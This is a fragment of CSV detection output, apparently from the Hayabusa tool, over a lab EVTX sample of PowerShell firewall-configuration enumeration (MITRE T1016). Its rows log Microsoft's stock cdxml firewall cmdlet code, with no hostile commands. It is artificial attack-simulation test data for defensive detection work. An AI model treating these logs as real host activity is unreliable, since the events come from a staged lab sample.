Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallApplicationFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' 
$script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if 
